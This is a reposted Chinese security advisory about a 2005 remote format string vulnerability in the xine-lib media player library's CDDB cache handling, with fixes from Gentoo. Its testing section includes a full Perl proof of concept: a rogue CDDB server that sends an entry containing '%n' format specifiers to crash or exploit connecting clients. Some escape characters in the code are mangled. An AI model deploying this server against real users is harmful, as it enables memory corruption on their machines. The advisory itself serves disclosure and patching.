Xine-Lib CDDB信息远程格式串漏洞
来源:岁月联盟
时间:2005-10-13
xine xine-lib 1.1.0
xine xine-lib 1.0.2
xine xine-lib 1.0.1
xine xine-lib 1.0
xine xine-lib 0.9.13
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 15044
CVE(CAN) ID: CAN-2005-2967
xine是一款免费的媒体播放器,支持多种格式。
在使用xine或gxine播放CD时,程序会连接到CDDB服务器以检索记录的艺术家、乐队、歌曲标题等,然后程序将这些信息写入缓存文件。xine-lib中代码在执行这个操作时存在格式串漏洞,可能允许远程执行任意代码。
<*来源:Ulf Harnhammar (ulfh@update.uu.se)
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=112877511901802&w=2
http://security.gentoo.org/glsa/glsa-200510-08.xml
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl --
# xine-cddb-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.
use strict;
use IO::Socket;
$main::port = 8880;
$main::timeout = 5;
# *** SUBROUTINES ***
sub mysend($)
{
my $file = shift;
my $str = shift;
print $file "$str/n";
print "SENT: $str/n";
} # sub mysend
sub myreceive($)
{
my $file = shift;
my $inp;
eval
{
local $SIG{ALRM} = sub { die "alarm/n" };
alarm $main::timeout;
$inp = <$file>;
alarm 0;
};
if ($@ eq "alarm/n") { $inp = ’’; print "TIMED OUT/n"; }
$inp =~ tr//015/012/000//d;
print "RECEIVED: $inp/n";
$inp;
} # sub myreceive
# *** MAIN PROGRAM ***
{
my $server = IO::Socket::INET->new( Proto => ’tcp’,
LocalPort => $main::port,
Listen => SOMAXCONN,
Reuse => 1);
die "can’t set up server!/n" unless $server;
while (my $client = $server->accept())
{
$client->autoflush(1);
print ’connection from ’.$client->peerhost."/n";
mysend($client, ’201 metaur CDDBP server v1.5PL2 ready at ’.
scalar localtime);
while (my $str = myreceive($client))
{
if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i)
{
mysend($client, "200 Hello and welcome $1/@$2 running $3.");
next;
}
if ($str =~ m/^proto (/d+)$/i)
{
mysend($client, "201 OK, CDDB protocol level now: $1");
next;
}
if ($str =~ m/^cddb query ([0-9a-f]+)/i)
{
mysend($client, "200 rock $1 Exploiters / Formatted and Stringed");
next;
}
if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i)
{
my $docum = <<HERE;
210 $1 $2 CD database entry follows (until terminating /`.’)
# %n%n%n%n
DISCID=$2
DTITLE=Exploiters / Formatted and Stringed
DYEAR=2005
DGENRE=Rock
TTITLE0=Format
TTITLE1=String
TTITLE2=Bug
EXTD= YEAR: 2005
EXTT0=
EXTT1=
EXTT2=
PLAYORDER=
.
HERE
$docum =~ s|/s+$||s;
mysend($client, $docum);
next;
}
if ($str =~ m/^quit$/i)
{
mysend($client, ’230 metaur Closing connection. Goodbye.’);
last;
}
mysend($client, ’500 Unrecognized command.’);
} # while str=myreceive(client)
close $client;
print "closed/n/n/n";
} # while client=server->accept()
}
建议:
--------------------------------------------------------------------------------
临时解决方法:
* 在设置中关闭CDDB查询。
厂商补丁:
Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200510-08)以及相应补丁:
GLSA-200510-08:xine-lib: Format string vulnerability
链接:http://security.gentoo.org/glsa/glsa-200510-08.xml
所有xine-lib用户都应升级到最新版本:
# emerge --sync
# emerge --ask --oneshot --verbose media-libs/xine-lib
上一篇:爆炸新闻:sohu存在严重漏洞!